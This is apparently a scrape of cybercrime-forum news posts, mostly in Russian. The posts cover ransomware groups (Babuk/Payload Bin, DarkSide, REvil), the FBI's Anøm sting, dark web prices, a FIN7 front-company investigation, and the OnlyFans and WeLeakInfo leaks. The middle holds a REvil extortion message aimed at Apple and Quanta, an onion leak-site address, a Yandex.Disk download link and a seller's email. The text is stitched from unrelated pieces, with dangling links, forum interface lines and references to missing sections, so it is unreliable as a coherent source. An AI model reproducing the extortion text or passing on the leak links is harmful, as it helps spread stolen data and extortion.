“Великобритания рассчитывает увеличить выделяемые странам Содружества наций средства по укреплению обороны в киберпространстве, – сказал Рааб. – Мы хотим работать с нашими партнерами, это общий интерес. Те, кто проводит ужасные кибератаки, являются нашим общим врагом”. Говоря об атаках со стороны хакеров- вымогателей, Рааб перечислил недавние инциденты, произошедшие как в Европе, так и в США, к которым были причастны хакеры из России.
Рааб также заявил, что на саммите G7 в Корнуолле лидеры Великобритании и США обсудят, как применять международное право в отношении кибератак и как заставлять государства, с территории которых действуют хакеры, привлекать к ответственности преступников. При этом он снова отметил, что Россия имеет отношение к подобным инцидентам в киберпространстве.
Payload Bin, ранее известная как Babuk, представила новую платформу утечек для
перспективных, но пока неизвестных, хакеров.
Заявившая о прекращении деятельности кибервымогательская группировка Babuk
появилась снова, но уже под названием Payload Bin. Хотя хакеры больше не
собираются сами похищать данные и требовать за них выкуп, они предоставят
такую возможность другим киберпреступникам, у которых нет собственного
названия и сайта утечек.
Напомним, Babuk объявила о прекращении своей деятельности в конце апреля
нынешнего года. Тем не менее, уже через две недели хакеры снова дали о себе
знать, представив новый, «по-настоящему крутой» проект.
«Привет! Мы анонсируем разработку чего-то по-настоящему крутого – огромной платформы независимых утечек. У нас нет правил и начальников, мы будем публиковать приватные продукты на единой информационной платформе, где мы также будем публиковать утечки успешных безымянных команд, у которых нет своих блогов и названий. Это не сопливые девчонки, бегущие, как крысы с тонущего корабля, и меняющие политики собственных ресурсов. Это по-настоящему сильные парни. Ожидайте следующей громкой утечки в течение недели», – на своем сайте.
Похоже, изменения уже начали вступать в силу – название сайта Babuk поменялось на Payload Bin. Разделы «О нас» и «Правила» пока недоступны, а в разделе «Объявления» пока упомянута лишь одна утечка – CD Projekt. Польский разработчик компьютерных игр CD Projekt стал жертвой кибератаки в феврале нынешнего года.
Операторы вымогательского ПО Hello Kitty похитили файлы CD Projekt и выставили на продажу на нескольких русскоязычных киберпреступных форумах внутренние документы компании и исходный код целого ряда ее продуктов, в том числе Thronebreaker, Witcher 3, невыпущенную версию Witcher 3 RTX и Cyberpunk 2077. Затем, правда, киберпреступники удалили свой товар, пояснив это тем, что получили интересное предложение за пределами форума, и условием сделки было удаление товара.
Как сообщается на сайте Payload Bin, весь исходный код продуктов CD Projekt снова будет доступен на нем.
Более 3х лет ФБР США и Австралийская федеральная полиция управляли зашифрованной платформой для обмена сообщениями с целью перехвата переписки участников преступных группировок по всему миру.
В понедельник, 7 июня, в рамках операции Operation Ironside сотрудники правоохранительных органов Австралии, Европы и США провели ряд обысков и арестовали сотни предположительных участников различных преступных организаций, начиная от австралийских банд байкеров и заканчивая наркокартелями в Азии и Южной Америке, а также торговцами оружием и людьми в Европе.
Как сообщила Австралийская федеральная полиция, операция началась в 2018 году, когда ФБР удалось заблокировать защищенную чат-платформу Phantom Secure, которой пользовались преступники. Предполагая, что лишившиеся безопасного средства для общения бандиты будут искать ему замену, правоохранители запустили собственный сервис- приманку Anøm (AN0M).
Как и Phantom Secure, решение представляло собой смартфон, сконфигурированный таким образом, чтобы на нем работало только одно приложение Anøm для отправки зашифрованных и голосовых сообщений (установить на устройство какие-либо другие приложения было невозможно). В приложении была предусмотрена возможность для правоохранительных органов перехватывать сообщения, в которых преступники зачастую обсуждали способы доставки наркотиков и планировали убийства.
Управлением платформой занималось ФБР, тогда как технические специалисты Австралийской федеральной полиции разработали систему расшифровки сообщений непосредственно в процессе их передачи.
Платформа Anøm рекламировалась на сайте anom.io, а также агентами под прикрытием, выдающими себя за преступников на черном рынке. В итоге количество пользователей платформы достигло 11 тыс. Правоохранители назвали Operation Ironside одним из крупнейших оперативных экспериментов за всю историю правоохранительных органов.
Решение о прекращении операции было принято после того, как преступники стали замечать, что их переписка стала утекать. В настоящее время известно об арестах в Австралии, Новой Зеландии, Германии и Швеции.
__
Police in sixteen countries have launched multiple raids after intercepting the communications of organised criminal groups in the biggest police hacking operation undertaken to date. Drug deals and other criminal groups in the UK, Europe, Canada, Australia, New Zealand and the US were sending...
www.computerweekly.com
[ https://washingtonpost.com/world/2021/06/08/fbi-app-arrests-australia-crime/ ](https://washingtonpost.com/world/2021/06/08/fbi-app-arrests-australia- crime/)
prices for illegal services/products available in the black marketplaces.
Over the last couple of years, we’ve all had our attention fixed on one of two things: the global pandemic and the previous year’s presidential elections.
Both issues are essential, and the pandemic has changed the practical lives of almost every human being on the planet, so it’s only natural for the world’s news services to focus on those two issues.
But while the world is “burning,” the world’s hackers are having a picnic, and hardly anybody is paying any attention. 2020 is a case in point. It was one of the worst years (if not the worst) for cyber attacks.
The victim list includes world-class institutions and corporations such as Lockheed Martin, T-Mobile, Microsoft, McDonald’s, [NASA](https://securityaffairs.co/wordpress/118323/reports/nasa-cyber- attacks.html). Even FireEye and [SolarWinds](https://securityaffairs.co/wordpress/112294/hacking/solarwinds- sec-filing.html) got hit, and those last two are digital security companies.
Almost none of the known attacks ended up stealing money but information. The natural question is, what use is that information to the hackers? How can they profit from it? Where does it all end up? The answer, of course, is the Dark Web.
[PrivacyAffairs previously released](https://www.privacyaffairs.com/dark-web- price-index-2021/) a [Dark Web](https://securityaffairs.co/wordpress/40933/cyber-crime/dark-web- cybercrime.html) Price Index for last year. It’s a menu of sorts. By reading it, you begin to understand why hackers are so active and how they can make a buck.
Let’s see some examples for this year’s index. The information for a cloned Mastercard (pin included) is worth 25 USD. An American Express, though, is 35 USD. A person’s credit card details and account balance are sold for 150 USD if the account balance is under 1000 USD, but 240 if it is under 5000 USD.
The list is quite extensive, and it goes on. It includes stolen online banking logins (price varies depending on the account’s worth), Walmart credit cards, global credit cards with CVV from the USA, the UK, Australia, Israel, Spain, or Japan. Stolen Paypal account details, Neteller, PerfectMoney, TransferGo, and other payment services are also on the list.
Cryptocurrencies are represented in hacked accounts to trading sites. A Kraken verified account’s info is worth 810 USD, for instance, but a Binance one is half as expensive.
Stolen social media accounts are also for sale: Facebook, Instagram, Twitter, Gmail, Instagram, Spotify, Twitch, LinkedIn, Pinterest, Soundcloud are all listed with prices that vary from 5USD to 80USD, the specific platform, the number of followers, and other variables.
What about services? You can buy an Uber account or bet for “free” at Bet365. Lykke, FedEx, Netflix, Kaspersky, NBA League Pass, Orange TV, Hulu, and HBO are available. The most expensive product in this category is a stolen eBay account with a good reputation (that means positive feedback from more than a thousand users) at 1000 USD.
But not all the stolen information on offer is strictly digital in origin. You can buy a Minnesota driver’s license for 20USD. The New York one is four times more expensive. Passports and IDs from different American states and European countries are on offer as well.
And there are even more specialized products such as DDoS attacks, email databases, and malware.
The illegal market in the Dark Web has grown significantly from last year. Trading volumes are higher, and product variety is wider, too –uber accounts and crypto accounts are a new thing. Fake IDs and stolen credit cards are selling by thousands.
And there are hundreds of vendors who feel confident enough to give their customers commercial offers like “buy a couple of cloned credit cards and get the third one for free!”
The Dark Web users, of course, are very aware of digital security and that law enforcement agencies around the world want to bring them down. So they have high-security practices in all ends. Many vendors do not take Bitcoin as payment. Monero is the cryptocurrency of choice, instead, and all communications must be PGP encrypted.
The Cloned Credit Card and Cardholder Data Market
Do you know about the law of supply and demand? It’s supposed to be the cornerstone mechanics of free markets. Well, it [doesn’t apply here](https://www.msn.com/es-mx/noticias/tecnologia/esto-es-lo-que-valen-las- cuentas-de-mail-netflix-y-facebook-robadas-en-la-dark-web-informe/ar-AAKzrhj). The supply in this market has increased markedly. But so have the prices. The chances are that the higher prices are linked to the increased risk of obtaining them.
Also, the stolen information is of higher quality, so it is more valuable to the buyer. It could also be just inflation, of course, but calculating economic indicators in black markets such as this one is exceedingly difficult.
Vendors even have guarantee policies. They assure their clients that eight out of every ten cards will work fine and have the advertised balance.
Payment Processors
PayPal accounts are the most frequent item in this market, and they can be pretty expensive. The highest price is for an actual transfer from a hacked account. That’s a trend: accounts have gone down in price, but transfers are more expensive.
So a PayPal account, for instance, cost 200 USD last year, and it’s currently priced at 30USD. On the other hand, a PayPal transfer was worth 320 USD, and it’s now at 340 USD.
If you buy one of these products, you will also get instructions on proceeding without informing the authorities. The guides add a cost of cents to the purchase, and it’s anybody’s guess if they work at all.
With the pandemic pushing so many people to have economic activities on the internet, payment processors are now more relevant than ever before. More retailers accept several forms of online payments.
Cryptocurrency trading accounts
Hacked accounts for crypto are highly-priced now. This has to do with the BTC price skyrocketing after the whole Elon Musk affair. Other cryptocurrencies have increased in value as well. Hacked accounts’ wallets may hold lots of digital assets as well as fiat currency. And in many sites, the security is not that great once you pass the initial verification process.
If you pair high-value crypto accounts with BTC ATMs, you give the hackers an easy way to cash out on the information quickly. The cheapest account is from crypto.com, and the most expensive one is Kraken. But Coinbaise, Coinfield, Cex.io, Blockchain.com, and Binance are in the mix as well.
Social Media
Hacked social media accounts’ prices are decreasing across all platforms. That is terrible news for the hackers because as social media corporations increase their security measures, hackers must steal the accounts through social engineering, which is labor-intensive, can’t be done from a computer in an isolated basement, and has a low success rate.
You can buy a thousand Instagram followers for 7 USD, a Facebook account for 75 USD, and a Gmail account for 156 USD, to name the best-known ones.
Services
The menu is broad in this category. Lykke is the most expensive hacked service at 260 USD. Orange TV and some porn sites are the cheapest at about 5 USD, depending on the site. But you can get a FedEx account, Netflix, Kaspersky, Uber (driver or client), Canva Pro, HBO, Netflix 4K, Ancestry .com, Adobe Creative Cloud and, the king of all services, an eBay account with an excellent reputation that will set you back by 1000 USD.
Forged documents
It’s probably the most well-known black market in history, if only because of spy novels, movies, and TV shows. But it’s now a digital thing too. You can buy your fake document as a digital scan or, if you want, as a physical document too.
Specialized vendors offer highly customizable services to their buyers, so the document can be made with any details the buyer wants. Thus, a diligent criminal can create an entire file of forged documents that seem legit, starting with only a handful of personal information without breaking the bank.
But this old market is not devoid of innovative elements. Document scans with selfies are a valuable purchase as they can be used for SIM swap attacks and personal data access in Europe and California.
Last but not least is the counterfeit money market. You can buy US Dollars, Euros, British Pounds, Canadian and Australian dollars. Some are even guaranteed to pass the UV pen test. Purchasing high-quality fake money will usually set you back by about a third of a note’s face value.
Email Databases
This product is prevalent and cheap because it’s available in the mainstream and has meager accuracy rates. Most email dumps come from aggregating previous email breaches. Only hackers are interested in this kind of product, of course.
Malware
The malware installs itself in a system without its owners’ knowledge (or willingness) and then grants hackers almost full power over it. It can be ransomware (you need to pay a ransom to regain control over your computer) or something less intrusive that steals your information.
Hackers can steal tens of thousands of dollars for every 1000 malware installs.
DDoS Attacks
A distributed denial of service attack brings a website down by overloading its traffic with false traffic. Nobody earns money through this kind of action, but bringing down a particular website can distract the public and cover other hacking activities.
How does this matter at all?
Dark web market data awareness is not just for your general edification. It gives you the perspective you need to understand that your personal data is not a nuisance but that it has value for you, concerns your security, and hackers, as they can use it for doing business. Also, it shows that exploiting you is not that hard, and it’s cheap.
You’ve undoubtedly heard the horror stories about people unsuspectingly losing their life savings or finding that hackers are selling their cam footage. Maybe you’ve thought that it could never happen to you? Think again. The personal information supply in the dark web sites is snowballing, and those who provide it are always working hard to get more. The chances of being hacked are higher every day.
It’s not personal. Not for hackers. The chances are that you will never be targeted individually. Why should they? There is so much data going around that everything is cheaper by the dozen, so they play the numbers. They know what they are doing, and so should you.
You need to adopt a secure digital lifestyle to ensure that it won’t be your credit card or your passport on offer on the Dark web next year. Again, it’s a numbers game, so a few precautions will go a long way in improving your security. After all, hackers don’t want (or need) to work that hard to collect their data with so many unsuspecting victims worldwide.
Preventing Identity Theft
Keeping yourself safe is not rocket science. Following just a few recommendations will almost nullify the probability of your personal data being stolen.
The habits explained above can be burdensome in the beginning, but they become one’s second nature quickly. You will merely be doing your part in protecting yourself, your identity online, and your very own future.
ProtonMail, самый защищённый почтовый клиент в мире, который не взломать. Швейцарская компания ProtonMail защищена одними из самых строгих законов о конфиденциальности в мире. У нее множество функций, предназначенных для защиты писем и личных данных. Компания утверждает, что ее электронные письма полностью зашифрованы, и она не может получить доступ к данным пользователей.
«Данные шифруются на стороне клиента с помощью ключа шифрования, к которому у нас нет доступа», — говорится на сайте. ProtonMail не требует для создания новой учетной записи никакой личной информации, даже журналов IP-адресов.
Тем не менее, несмотря на обещанную конфиденциальность, сервис хранит информацию о письмах пользователей.
Журналисты Центра «Досье» совместно с изданиями The Daily Beast и Der Spiegel утверждают, что им удалось получить копию электронного письма, которое «ХАМАС» с помощью сервиса ProtonMail отправил в аэропорт Минска. Из него следует, что белорусские диспетчеры сообщили пилотам Ryanair о минировании самолета на 27 минут раньше, чем сами получили сообщение о бомбе. Об этом сообщает mixnews.lv.
По данным Центра «Досье», сообщение с угрозой от «солдат ХАМАС», отправленное с адреса ahmed_yurlanov1988@protonmail.com , пришло на почту «Белавиа» в 12:57 по белорусскому времени. При этом уже в 12:33 диспетчеры рекомендовали самолёту Ryanair экстренно приземлиться в минском аэропорту из-за угрозы минирования. В 12:30 самолёт вошел в воздушное пространство Белоруссии. В ту же минуту белорусская сторона проинформировала экипаж о предполагаемой угрозе взрыва. В 12:47 самолёт изменил курс и полетел в сторону Минска.
В официальном заявлении Управления авиации Минтранса Белоруссии не говорится, во сколько пришло электронное письмо. Расследовали подтвердили, что сообщение поступило с защищённого сервиса электронной почты Protonmail, зарегистрированного в Швейцарии. Точное местонахождение автора определить невозможно.
Партнеры выдвинули претензию на биткойны, хранящиеся на хакерском форуме.
С тех пор, как деятельность вымогательской группировки DarkSide была прекращена , несколько партнеров начали жаловаться на отсутствие платы за прошлые услуги. Партнеры выдвинули претензию на биткойны, хранящиеся на хакерском форуме. Об этом сообщило издание Bleeping Computer.
Русскоязычные киберпреступные сообщества обычно используют специальный криптовалютный счет с целью избежать мошенничества между продавцами и покупателями. Для операций с программами-вымогателями залог является гарантией того, что ведется серьезный бизнес.
С целью завоевать доверие потенциальных партнеров и расширить свою деятельность, DarkSide разместила 22 биткойна на популярном хакерском форуме XSS. Кошелек управляется администратором сайта, который в этом случае выступает в качестве гаранта для группировки и партнера в случае возникновения спора.
Ранее DarkSide прекратила свою преступную деятельность и сообщила партнерам, что решение было принято после потери доступа к их публичным серверам и «из-за давления со стороны США» после атаки на американского топливного гиганта Colonial Pipeline.
Прекращение деятельности «вымогателя-как услуги» (RaaS) DarkSide было внезапным и явно оставило некоторые незавершенные дела. Пять партнеров пожаловались на то, что операторы задолжали им деньги за уплаченный выкуп или за услуги взлома.
Как утверждают первые партнеры, они осуществляли основную часть атаки, и должны были получить 80% от суммы выкупа. Жертва заплатила, однако операторы DarkSide заявили, что у них больше нет доступа к средствам, и партнер может использовать депозит в XSS для получения платежа.
По словам других партнеров, у них были биткойны на партнерском портале, но им пришлось поспешить к своим родственникам, прежде чем они могли получить средства.
Еще один партнер работал над взломом корпоративных сетей, но так и не получил свой последний платеж в размере $150 тыс. Другому партнеру перечислили $72 тыс. на партнерский портал, но он не смог получить их до прекращения работы группировки.
В случае первого иска администратор форума утвердила компенсацию из депозита DarkSide. Другие партнеры пока что не получили ответ от администрации.
You must spend at least 90 day(s) on the forum to view the content.
](https://disk.yandex.com.tr/d/E00Wz8O9wJExqw)
Görüntüle ve Yandex.Disk'ten indir
disk.yandex.com.tr
EMAIL :yesilsec@protonmail.com
Products:
Apple Watch
Apple Macbook Air
Apple Macbook Pro
ThinkPad Z60m
In order not to wait for the upcoming Apple presentations, today we, the REvil group, will provide data on the upcoming releases of the company so beloved by many.Tim Cook can say thank you Quanta.From our side, a lot of time has been devoted to solving this problem. Quanta has made it clear to us that it does not care about the data of its customers and employees, thereby allowing the publication and sale of all data we have.
P.S.
Our team is negotiating the sale of large quantities of confidential drawings
and gigabytes of personal data with several major brands.
We recommend that Apple buy back the available data by May 1.
More and more files will be added every day.
The same is in pdf format
."]
[/SPOILER]
Источник
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
Летом 2018 года американский Минюст сообщил об аресте трех участников группировки FIN7, также известной как Carbanak. Группу считают причастной к взлому более 100 американских компаний и хищению данных 15 млн банковских карт. FIN7 с 2015 года совершала преступления не только в США, но и в Великобритании, Австралии и Франции. Арестованным по этому делу гражданам Украины Федору Гладырю, Дмитрию Федорову и Андрею Колпакову вменяют многочисленные эпизоды банковского мошенничества, компьютерных взломов и краж личных данных. Все они были высокопоставленными участниками хакерской группы, утверждают правоохранительные органы США.
Однако, по заявлению ряда изданий, FIN7 продолжает создавать вредоносное ПО и проводить атаки, а множество ее участников, по данным Минюста, остаются на свободе. Поиск людей в FIN7 все эти годы был организован масштабно: хакеры открыли фиктивную компанию Combi Security, которая официально занималась пентестами (тестирование защищенности ИТ-систем), и от имени которой искали сотрудников на сайтах по поиску легальной работы. Combi Security оказалась не единственной ширмой хакеров.
РБК выяснил, как выпускники московского технического вуза создали еще одну компанию, связанную с FIN7, и нанимали людей, которые сами того не зная, оказались «русскими хакерами».
Семейный IT-подряд
Весной 2018 года семья Завгородних из Тулы праздновала свадьбу сына, 25-летнего Артема. Гуляли в Москве, в украшенном золотом и лепниной Большом дворце, построенном в конце XVIII века в парке «Царицыно». Отец Артема Владимир Завгородний охотно делился снимками в соцсетях: он запечатлел себя рядом с украшенным цветами BMW, купленным незадолго до торжества, затем позировал в центре богато украшенного зала.
Владимир долгое время не имел отношения к информационным технологиям. Он работал на Тульском механическом заводе, затем создал небольшую компанию по поставкам промышленного оборудования, а потом переехал в Москву и сейчас называет себя владельцем «Центра продвижения инвестиционных проектов». Следов какой-либо деятельности этой компании обнаружить не удалось, а юридическое лицо ООО «Центр продвижения инвестиционных проектов» не существует — в 2015 году Завгородний переименовал его в ООО «Легион-Ремоут», а затем создал еще одну компанию с таким же названием в Минске. Сферой деятельности обоих предприятий указал разработку ПО.
Артем Завгородний технологиями интересовался. В 2009 году он поступил в Московский государственный университет приборостроения и информатики (МГУПИ) и стал предпринимать попытки зарабатывать в интернете. Для регистрации в различных онлайн-сервисах он выбрал себе ник zavartyom. Электронную почту с этим никнеймом Завгородний-младший использовал для переписки с корреспондентом РБК, на нее же, согласно сервису восстановления паролей, зарегистрировал своей первый аккаунт во «ВКонтакте». Те же никнейм и почту он указал на форуме для торговцев криптовалютами Hamaha и в сервисе Foursquare. В профилях во всех его соцсетях и на форуме для трейдеров есть фотографии, на которых изображен один и тот же человек.
В 2009–2010 годах на электронную почту и имя Артема, по данным Reg.ru, было зарегистрировано более десятка различных доменов — xakmen.ru, allblack.ru, forextreme.ru и др., которые zavartyom пытался безуспешно продать на специализированном форуме. В 2012-м году на banki.ru появилось сообщение zavartyom о поиске банка «для ООО, вопросы про обнал». Спустя год на форуме DarkMoney — одном из крупнейших для общения по вопросам обналичивания — zavartyom пытался продать данные о банковских картах, предложив купить у него три карты МТС Банка за 6500 руб. В 2014-м zavartyom появился на форуме Vor.nz (позиционирует себя как форум для нелегальных операций с банковскими картами, то есть кардинга) и на предложение одного из пользователей обучить кардингу оставил сообщение: «Буду рад поработать с тобой». В том же году Завгородний- младший окончил университет и с 2015 по 2017 год работал в компании отца. На его странице в LinkedIn указано, что он был венчурным партнером «Легион- Ремоут».
В этот бизнес он пришел не один. С 2016 года системным аналитиком в «Легион- Ремоут» работал Иван Аляпкин из Пензы, говорится в его резюме, размещенном на сайте SuperJob. Это однокурсник Завгороднего по МГУПИ, значится на его странице во «ВКонтакте», этот факт на условиях анонимности подтвердила общая знакомая молодых людей, которая училась вместе с ними.
Аляпкин по телефону подтвердил РБК, что работал в «Легион-Ремоут», но сообщил, что компания была «фиктивная». После вопросов, как «Легион-Ремоут» связана с Combi Security и хакерскими атаками, он прервал разговор и перестал отвечать на звонки и сообщения. Артем Завгородний в ответ на вопросы о «Легион-Ремоут» и FIN7 предложил встретиться, чтобы дать комментарии, но отменил встречу. Владимир Завгородний на письма и сообщения РБК не ответил. После расспросов РБК Завгородние и Иван Аляпкин удалили большую часть информации о себе из соцсетей, пропали в том числе и фото пышной церемонии в Царицыно, однако копии материалов есть в распоряжении РБК.
Имя им «Легион-Ремоут»
Нежелание говорить о «Легион-Ремоут» может быть связано с фактом, что на сайте SuperJob компания Combi Security, которую правоохранительные органы США считают ширмой FIN7, в некоторых объявлениях сначала фигурировала под именем «Легион-Ремоут», следует из кэша «Яндекса» и Google. В пресс-службе SuperJob подтвердили, что страница компании была зарегистрирована в 2015 году и ранее называлась «Легион-Ремоут», а в 2016 году переименована в Combi Security. Но в некоторых вакансиях на сайте рекламных объявлений Cataloxy и в справочнике SpravkaForMe.ru по-прежнему указано, что под брендом Combi Security работает «Легион-Ремоут».
С 2015 года, когда начала работу FIN7, до 2018 года «Легион-Ремоут» массово размещала на сайтах по поиску работы практически идентичные с Combi Security вакансии для ИТ-специалистов из России, Белоруссии и Украины, в основном реверс-инженеров — специалистов, которые могут изучить исходный код готовой программы и, при необходимости, внести в него какие-то изменения. Среди требований было базовое понимание разработки эксплойтов, то есть программ для проведения атаки на вычислительные системы с помощью уязвимостей, которые есть в установленном на этой системе софте.
«В поисках квалифицированных кадров киберпреступники часто пытаются замаскировать предложения работы, связанной с написанием вредоносного кода, под легальные вакансии. Конечно, реверс-инженеры могут быть наняты для легитимных целей, но когда от кандидатов требуется понимание разработки эксплойтов, навыки работы с инъекциями в процесс (внедрение кода программы в другую, не нарушающее функционирования последней. — РБК) и другие умения, которые ценятся среди авторов вредоносного ПО, это может косвенно указывать на попытку маскировки вакансии вирусописателя», — рассказывает руководитель российского исследовательского центра «Лаборатории Касперского» Юрий Наместников.
В интернет-архиве Wayback Machine сохранилась версия сайта legion-remote.com от декабря 2015 года, согласно которой компания специализировалась на разработке системы удаленного доступа и зарегистрирована в Москве, на Волгоградском проспекте. Этот же адрес указан для ООО «Легион-Ремоут» в ЕГРЮЛ, однако найти там офис этой компании РБК не удалось: опрошенные сотрудники фирм, снимающих офисы по этому адресу, никогда не слышали о «Легион-Ремоут».
Наместников сообщил РБК, что «Лаборатория Касперского» ведет собственную базу легального программного обеспечения и каких-либо упоминаний о «Легион-Ремоут» в ней нет. «Отсутствие цифровых следов о «Легион-Ремоут» в сочетании с объявлениями о работе, в которых одновременно упоминаются «Легион-Ремоут» и Combi Security, использование адреса массовой регистрации для «Легион-Ремоут» ставят под сомнение подлинность компании и позволяют предположить, что существует вероятность, что «Легион-Ремоут» — еще одна подставная компания для FIN7», — подтвердил выводы РБК старший аналитик американской компании по информбезопасности Digital Shadows Рафаэль Амадо.
Но «Легион-Ремоут» по-прежнему существует минимум на бумаге. Московское ООО сейчас находится в негативном реестре: компания не предоставляла налоговую отчетность более года. Структура из Минска включена в реестр лжепредпринимателей и готовится к ликвидации.
Работа на анонимного дядю
Бывший сотрудник Combi Security, на условиях анонимности пообщавшийся с РБК, утверждает, что устроился туда как раз по объявлению на сайте поиска работы. По его словам, он и коллеги не подозревали, что занимаются чем-то противозаконным, и не были знакомы друг с другом.
«В глаза я никого не видел. Все проходило удаленно: давалось задание и время на выполнение, мы возвращали результат. К кражам банковских карт и POS- терминалам конкретно моя группа ни разу не прикасалась. Собственно, все были уверены, что мы работаем как red team (команда тестеров, которые имитируют атаку хакеров. — РБК), но легально», — говорит он.
Никого из менеджмента Combi Security, по его словам, он не знал, с тремя арестованными гражданами Украины, которых обвинили в участии в FIN7, не знаком, с Артемом и Владимиром Завгородними — тоже.
Партнер юридической фирмы Bukh Global Аркадий Бух, который защищает арестованного по запросу США Федора Гладыря, утверждает, что тот тоже не знаком не только с Артемом и Владимиром Завгородними, но и с Андреем Колпаковым и Дмитрием Федоровым, но что в хакерской среде это обычное дело.
«Культура форумов в даркнете, где обычно знакомятся хакеры, такова, что никто ни у кого не спрашивает имена и не встречается лично. Доступ сюда предоставляется по рекомендациям и за определенную плату, которая может составлять до $50 тыс. По этой причине люди, которых обвиняют в участии в хакерских группировках, в большинстве случаев ничего не знают друг о друге, хотя и могли работать вместе», — говорит Бух.
Адвокат Дмитрия Федорова Колин Фиман не ответил на просьбы о комментариях. Запросить Колпакова не удалось — у него нет адвоката, следует из материалов дела.
Растущий рынок на миллиард
Из-за использования компаний, которые занимаются пентестами, в качестве хакерских ширм появилось предубеждение, что этичные специалисты, которые действительно ищут уязвимости и делают тесты на проникновение для проверки защищенности различных компаний, также могут участвовать во взломах.
Однако Юрий Гуркин, руководитель компании Gleg, занятой исследованиями уязвимостей в промышленном ПО, в это не слишком верит. «Сейчас вокруг пентеста ходит масса слухов, что «белые» хакеры могут промышлять несанкционированными взломами, но я не знаю прецедентов, когда это было бы доказано. Власти США, например, обвиняли в чем-то подобном компанию Digital Security, но доказательств не представили, так что это скорее политика», — утверждает он. Российская Digital Security, которая занимается пентестами, попала под санкции США в июне 2018 года. Министерство финансов обвинило ее в злонамеренной киберактивности. Но глава Digital Security Илья Медведовский все обвинения в адрес компании отвергал.
В любом случае, пентест — уже значительный рынок в России, его объем по итогам 2018 года составляет примерно 1 млрд руб., сообщили РБК в компании Zecurion. Только за 2018 год на сайте hh.ru было опубликовано 178 вакансий, в описании которых в качестве обязательного навыка указано умение работать с эксплойтами, а годом ранее таких вакансий на сайте было 150. Проблема лишь в том, что они могут использоваться как при пентестах, так и при проведении настоящих хакерских атак.
Разработка эксплойтов, согласно ст. 273 УК России, незаконна, но следственным органам еще нужно доказать, что программа действительно является вредоносной, поясняет юрист Центра цифровых прав Саркис Дарбинян. «В теории компании могут нанимать специалистов со знанием разработки эксплойтов для абсолютно легальных целей. Однако массовый поиск таких специалистов компанией, которая не занимается таким тестированием и вообще неизвестна на рынке, может быть предметом для дополнительного интереса», — говорит Дарбинян.
Директор центра мониторинга и реагирования на кибератаки Solar JSOC компании «Ростелеком-Solar» Владимир Дрюков говорит, что «исследование уязвимостей, тестирование на проникновение и разработка специализированного софта могут использоваться во вред без ведома самого сотрудника, особенно если он не слишком опытный. Вредоносное ПО обычно имеет сложную составную структуру, и некоторые функциональные модули могут не содержать явных признаков того, что их планируется использовать в нелегитимных целях».
Дрюков предупреждает, что соискателям стоит быть осторожнее и обращать внимание на задачи, которые им предлагает решить компания. Например, подозрительным является требование реализовать в исходном коде разрабатываемого софта функции, направленные на сокрытие его активности, в особенности от средств защиты. Кроме того, стоит обращать внимание на отсутствие какой-либо коммуникации с заказчиком или вендором, чьи инфраструктуры и продукты проверяются, а также дополнительные вопросы от работодателя о вариантах использования результатов работы — найденных уязвимостей и других брешей в защите компании. Но гарантий нет, заключает Дрюков.
Эксперты ИБ-фирмы BackChannel заметили, что на RaidForums распространяется ссылка на Google Drive, заполненный контентом для взрослых с платформы OnlyFans.

OnlyFans позиционируется как сайт, где создатели контента могут напрямую зарабатывать деньги, делясь изображениями, видео и стримами со своими поклонниками, которые платят за подписку. Хотя ресурс рекламируется как платформа для знаменитостей и влиятельных лиц, он весьма популярен и активно используется для обмена контентом для взрослых.
По данным BackChannel, обнаруженный дамп содержит материалы от 279 создателей контента, причем большая часть этих материалов датирована октябрем 2020 года. Только в одной из папок исследователи нашли более 10 Гб видео и фотографий.
Эксперты полагают, что этот дамп был собран сразу несколькими людьми:
«Подписчики OnlyFans нередко обмениваются файлами друг с другом. OnlyFans имеет весьма слабые механизмы для контроль контента, и существует множество ботов и парсеров, которые может использовать легитимный подписчик. Уникальность этого [дампа] в том, что
так много пользователей объединены в одну папку».Click to expand...
У создателей контента, чьи права нарушает эта утечка, есть большая проблема. Дело в том, что владельцы контента на OnlyFans должны сообщать о нарушениях авторских прав на каждый отдельный файл, и лишь так их можно удалить с Google Drive. Если утечка затронула много файлов, это может быть весьма утомительным занятием.
Поскольку выяснилось, что обнаруженная папка используется совместно с учетной записью городского колледжа Сан-Франциско, эксперты BackChannel пытаются связаться с учебным заведением и добиться ее полного удаления.

Кроме того, чтобы помочь создателям контента определить, пострадали ли они от
этой утечки, аналитики BackChannel создали специальную страницу, где можно
проверить свой username.

Источник: xakep.ru/2021/04/06/onlyfans-leak/
Полиция Молдовы установила личности двух участников преступной группы, которые похищали средства с банковских карт граждан и отмывали их через криптовалюту. Об этом сообщают местные СМИ.
По данным следствия, в течение 2020 года и до настоящего времени подозреваемые перевели на личные счета 2 млн леев (свыше $113 000 на момент написания). В дальнейшем они конвертировали их в биткоин и Litecoin.
В ходе одного из обысков сотрудники полиции изъяла 560 000 леев (более $31 600) наличными и две машины.
Подозреваемые арестованы на 30 суток, им грозит до восьми лет тюрьмы.
• Source: <https://stiri.md/article/social/escrocherii-cu-carduri-bancare- tranzactii-de-milioane-si-2-retinuti>
Лёд тронулся, господа присяжные заседатели, рансомварщики начали открывать для себя другие языки:
https://www.bleepingcomputer[.]com/...-is-likely-the-first-ransomware-written- in-d/
~32mb Size
Click to expand...
Не знаю, что можно было там статически влинковать, чтобы получить 32мб экзешник, но это эпик вин.
In the best example of karma that the internet can provide, private information from several cybercriminals who bought leaked data on the WeLeakInfo website ended up, themselves, exposed on the world wide web. And an FBI waver may have been the trigger for that.
In January 2020, the WeLeakInfo domain was seized by the FBI. The forum was a point well known as a repository of information stolen from people, and several hackers in the world maintained accounts open in it to buy said information.
After the FBI's apprehension, however, an unidentified hacker said that US federal officials were not very diligent in closing the forum. According to him, the site had a separate domain, used only for payment processing through the company Stripe.
As a result, this second domain won in March, allowing anyone to redeem it on their behalf, assuming authority over it. And that’s what that person did. After performing a simple password reset process associated with the Stripe account, he was able to access all data from cybercriminals who made some payment to WeLeakInfo through the processing platform - including the two owners of the forum before it was taken over by the FBI.
Over 12 billion credentials
According to Cyber News, the information obtained now is what should be called
a "double-edged sword": on the one hand, it can be used by investigative
authorities to obtain greater evidence against all prisoners at the close of
WeLeakInfo. On the other hand, by making the database available to the public,
other cybercriminals can also access it and practice fraud or extortion,
causing even more security breaches.
However, users who made their purchases via PayPal or bitcoin escaped this leak, as neither system uses Stripe's structure to process payments made.
